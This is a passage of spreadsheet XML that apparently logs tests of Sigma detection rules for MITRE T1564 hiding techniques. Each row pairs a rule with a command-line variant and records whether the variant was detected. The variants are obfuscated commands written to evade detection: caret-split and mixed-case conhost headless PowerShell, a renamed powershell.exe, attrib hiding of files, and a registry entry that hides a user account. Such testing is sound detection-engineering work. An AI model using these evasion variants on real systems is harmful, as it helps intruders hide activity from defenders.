      <c r="E2030" s="43" t="inlineStr">
        <is>
          <t>regsvr32 /S "C:\Program Files\Oracle\VirtualBox\VboxC".dll</t>
        </is>
      </c>
      <c r="F2030" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2030" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2030" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2030" s="43" t="inlineStr">
        <is>
          <t>Scripting/CommandLine Process Spawned Regsvr32 (ab37a6ec-6068-432b-a64e-2c7bf95b1d22)</t>
        </is>
      </c>
      <c r="J2030" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2030" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2031" ht="15.75" customHeight="1" s="42">
      <c r="A2031" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2031" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_hiding_files</t>
        </is>
      </c>
      <c r="C2031" s="43" t="inlineStr">
        <is>
          <t>Hiding Files with Attrib.exe</t>
        </is>
      </c>
      <c r="D2031" s="43" t="inlineStr">
        <is>
          <t>4281cb20-2994-4580-aa63-c8b86d019934</t>
        </is>
      </c>
      <c r="E2031" s="43" t="inlineStr">
        <is>
          <t>attrib.exe "+h" C:\Users\thaim\AppData\Local\Temp\T1564.001.txt</t>
        </is>
      </c>
      <c r="F2031" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2031" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2031" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2031" s="43" t="n"/>
      <c r="J2031" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2031" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2032" ht="15.75" customHeight="1" s="42">
      <c r="A2032" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2032" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_hiding_files</t>
        </is>
      </c>
      <c r="C2032" s="43" t="inlineStr">
        <is>
          <t>Hiding Files with Attrib.exe</t>
        </is>
      </c>
      <c r="D2032" s="43" t="inlineStr">
        <is>
          <t>4281cb20-2994-4580-aa63-c8b86d019934</t>
        </is>
      </c>
      <c r="E2032" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c attrib.exe +h^  C:\Users\thaim\AppData\Local\Temp\T1564.001.txt</t>
        </is>
      </c>
      <c r="F2032" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2032" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2032" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2032" s="43" t="inlineStr">
        <is>
          <t>Hiding Files with Attrib.exe (4281cb20-2994-4580-aa63-c8b86d019934)</t>
        </is>
      </c>
      <c r="J2032" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2032" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2033" ht="15.75" customHeight="1" s="42">
      <c r="A2033" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2033" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_hiding_files</t>
        </is>
      </c>
      <c r="C2033" s="43" t="inlineStr">
        <is>
          <t>Hiding Files with Attrib.exe</t>
        </is>
      </c>
      <c r="D2033" s="43" t="inlineStr">
        <is>
          <t>4281cb20-2994-4580-aa63-c8b86d019934</t>
        </is>
      </c>
      <c r="E2033" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-ItemProperty -Path 'C:\Users\thaim\AppData\Local\Temp\T1564.001.txt' -Name Attributes -Value ([System.IO.FileAttributes]::Hidden)"</t>
        </is>
      </c>
      <c r="F2033" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2033" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2033" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2033" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); PowerShell Script Run in AppData (ac175779-025a-4f12-98b0-acdaeb77ea85)</t>
        </is>
      </c>
      <c r="J2033" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2033" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2034" ht="15.75" customHeight="1" s="42">
      <c r="A2034" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2034" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_system_susp_paths</t>
        </is>
      </c>
      <c r="C2034" s="43" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE</t>
        </is>
      </c>
      <c r="D2034" s="43" t="inlineStr">
        <is>
          <t>efec536f-72e8-4656-8960-5e85d091345b</t>
        </is>
      </c>
      <c r="E2034" s="43" t="inlineStr">
        <is>
          <t>attrib.exe "+s" C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F2034" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2034" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2034" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2034" s="43" t="n"/>
      <c r="J2034" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2034" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2035" ht="15.75" customHeight="1" s="42">
      <c r="A2035" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2035" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_system_susp_paths</t>
        </is>
      </c>
      <c r="C2035" s="43" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE</t>
        </is>
      </c>
      <c r="D2035" s="43" t="inlineStr">
        <is>
          <t>efec536f-72e8-4656-8960-5e85d091345b</t>
        </is>
      </c>
      <c r="E2035" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c attrib.exe +s^  C:\Users\Public\payload.exe</t>
        </is>
      </c>
      <c r="F2035" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2035" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2035" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2035" s="43" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE (efec536f-72e8-4656-8960-5e85d091345b)</t>
        </is>
      </c>
      <c r="J2035" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2035" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2036" ht="15.75" customHeight="1" s="42">
      <c r="A2036" s="43" t="inlineStr">
        <is>
          <t>t1564.001</t>
        </is>
      </c>
      <c r="B2036" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_attrib_system_susp_paths</t>
        </is>
      </c>
      <c r="C2036" s="43" t="inlineStr">
        <is>
          <t>Set Suspicious Files as System Files Using Attrib.EXE</t>
        </is>
      </c>
      <c r="D2036" s="43" t="inlineStr">
        <is>
          <t>efec536f-72e8-4656-8960-5e85d091345b</t>
        </is>
      </c>
      <c r="E2036" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(Get-Item 'C:\Users\Public\payload.exe').Attributes = 'System'"</t>
        </is>
      </c>
      <c r="F2036" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2036" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2036" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2036" s="43" t="n"/>
      <c r="J2036" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2036" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2037" ht="15.75" customHeight="1" s="42">
      <c r="A2037" s="43" t="inlineStr">
        <is>
          <t>t1564.002</t>
        </is>
      </c>
      <c r="B2037" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_special_accounts_hide_user</t>
        </is>
      </c>
      <c r="C2037" s="43" t="inlineStr">
        <is>
          <t>Hiding User Account Via SpecialAccounts Registry Key - CommandLine</t>
        </is>
      </c>
      <c r="D2037" s="43" t="inlineStr">
        <is>
          <t>9ec9fb1b-e059-4489-9642-f270c207923d</t>
        </is>
      </c>
      <c r="E2037" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c reg.exe a^dd "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v AtomicOperator$ /t REG_DWORD /d 0</t>
        </is>
      </c>
      <c r="F2037" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2037" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2037" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2037" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Hiding User Account Via SpecialAccounts Registry Key - CommandLine (9ec9fb1b-e059-4489-9642-f270c207923d)</t>
        </is>
      </c>
      <c r="J2037" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2037" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2038" ht="15.75" customHeight="1" s="42">
      <c r="A2038" s="43" t="inlineStr">
        <is>
          <t>t1564.002</t>
        </is>
      </c>
      <c r="B2038" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_special_accounts_hide_user</t>
        </is>
      </c>
      <c r="C2038" s="43" t="inlineStr">
        <is>
          <t>Hiding User Account Via SpecialAccounts Registry Key - CommandLine</t>
        </is>
      </c>
      <c r="D2038" s="43" t="inlineStr">
        <is>
          <t>9ec9fb1b-e059-4489-9642-f270c207923d</t>
        </is>
      </c>
      <c r="E2038" s="43" t="inlineStr">
        <is>
          <t>REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" "/v" AtomicOperator$ /t REG_DWORD "/d" 0</t>
        </is>
      </c>
      <c r="F2038" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2038" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2038" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2038" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829)</t>
        </is>
      </c>
      <c r="J2038" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2038" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2039" ht="15.75" customHeight="1" s="42">
      <c r="A2039" s="43" t="inlineStr">
        <is>
          <t>t1564.002</t>
        </is>
      </c>
      <c r="B2039" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_special_accounts_hide_user</t>
        </is>
      </c>
      <c r="C2039" s="43" t="inlineStr">
        <is>
          <t>Hiding User Account Via SpecialAccounts Registry Key - CommandLine</t>
        </is>
      </c>
      <c r="D2039" s="43" t="inlineStr">
        <is>
          <t>9ec9fb1b-e059-4489-9642-f270c207923d</t>
        </is>
      </c>
      <c r="E2039" s="43" t="inlineStr">
        <is>
          <t>REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" -v AtomicOperator$ -t REG_DWORD -d 0</t>
        </is>
      </c>
      <c r="F2039" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2039" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2039" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2039" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829)</t>
        </is>
      </c>
      <c r="J2039" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2039" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2040" ht="15.75" customHeight="1" s="42">
      <c r="A2040" s="43" t="inlineStr">
        <is>
          <t>t1564.002</t>
        </is>
      </c>
      <c r="B2040" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_special_accounts_hide_user</t>
        </is>
      </c>
      <c r="C2040" s="43" t="inlineStr">
        <is>
          <t>Hiding User Account Via SpecialAccounts Registry Key - CommandLine</t>
        </is>
      </c>
      <c r="D2040" s="43" t="inlineStr">
        <is>
          <t>9ec9fb1b-e059-4489-9642-f270c207923d</t>
        </is>
      </c>
      <c r="E2040" s="43" t="inlineStr">
        <is>
          <t>REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\"Userlist /v AtomicOperator$ /t REG_DWORD /d 0</t>
        </is>
      </c>
      <c r="F2040" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2040" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2040" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2040" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829)</t>
        </is>
      </c>
      <c r="J2040" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2040" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2041" ht="15.75" customHeight="1" s="42">
      <c r="A2041" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2041" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2041" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2041" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2041" s="43" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" "C:\Windows\System32\WindowsPowerShell\v1.0\pwsh.exe -Command Write-Host 'Bypassed'"</t>
        </is>
      </c>
      <c r="F2041" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2041" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2041" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2041" s="43" t="n"/>
      <c r="J2041" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2041" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2042" ht="15.75" customHeight="1" s="42">
      <c r="A2042" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2042" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2042" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2042" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2042" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --headless "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F2042" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2042" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2042" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2042" s="43" t="n"/>
      <c r="J2042" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2042" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2043" ht="15.75" customHeight="1" s="42">
      <c r="A2043" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2043" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2043" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2043" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2043" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --heADLEss "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F2043" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2043" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2043" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2043" s="43" t="n"/>
      <c r="J2043" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2043" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2044" ht="15.75" customHeight="1" s="42">
      <c r="A2044" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2044" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2044" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2044" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2044" s="43" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F2044" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2044" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2044" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2044" s="43" t="n"/>
      <c r="J2044" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2044" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2045" ht="15.75" customHeight="1" s="42">
      <c r="A2045" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2045" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2045" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2045" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2045" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --hEadLESs "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F2045" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2045" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2045" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2045" s="43" t="n"/>
      <c r="J2045" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2045" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2046" ht="15.75" customHeight="1" s="42">
      <c r="A2046" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2046" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2046" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2046" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2046" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --hEadLeSs "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F2046" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2046" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2046" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2046" s="43" t="n"/>
      <c r="J2046" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2046" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2047" ht="15.75" customHeight="1" s="42">
      <c r="A2047" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2047" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2047" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2047" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2047" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdlesS "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F2047" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2047" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2047" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2047" s="43" t="n"/>
      <c r="J2047" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2047" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2048" ht="15.75" customHeight="1" s="42">
      <c r="A2048" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2048" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2048" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2048" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2048" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F2048" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2048" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2048" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2048" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2048" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2048" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2049" ht="15.75" customHeight="1" s="42">
      <c r="A2049" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2049" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2049" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2049" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2049" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --heADLEsS not_ps.exe -CommaND Get-Process</t>
        </is>
      </c>
      <c r="F2049" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2049" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2049" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2049" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2049" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2049" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2050" ht="15.75" customHeight="1" s="42">
      <c r="A2050" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2050" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2050" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2050" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2050" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headLeSs not_ps.exe -COMMAnd Get-Process</t>
        </is>
      </c>
      <c r="F2050" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2050" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2050" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2050" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2050" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2050" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2051" ht="15.75" customHeight="1" s="42">
      <c r="A2051" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2051" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2051" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2051" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2051" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headLESs not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F2051" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2051" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2051" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2051" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2051" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2051" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2052" ht="15.75" customHeight="1" s="42">
      <c r="A2052" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2052" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2052" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2052" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2052" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe /"-headless" not_ps.exe -COmMANd Get-Process</t>
        </is>
      </c>
      <c r="F2052" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2052" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2052" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2052" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2052" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2052" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2053" ht="15.75" customHeight="1" s="42">
      <c r="A2053" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2053" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2053" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2053" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2053" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -cOmmaNd Get-Process</t>
        </is>
      </c>
      <c r="F2053" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2053" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2053" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2053" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2053" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2053" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2054" ht="15.75" customHeight="1" s="42">
      <c r="A2054" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2054" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2054" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2054" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2054" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe -"-headless" not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F2054" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2054" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2054" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2054" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
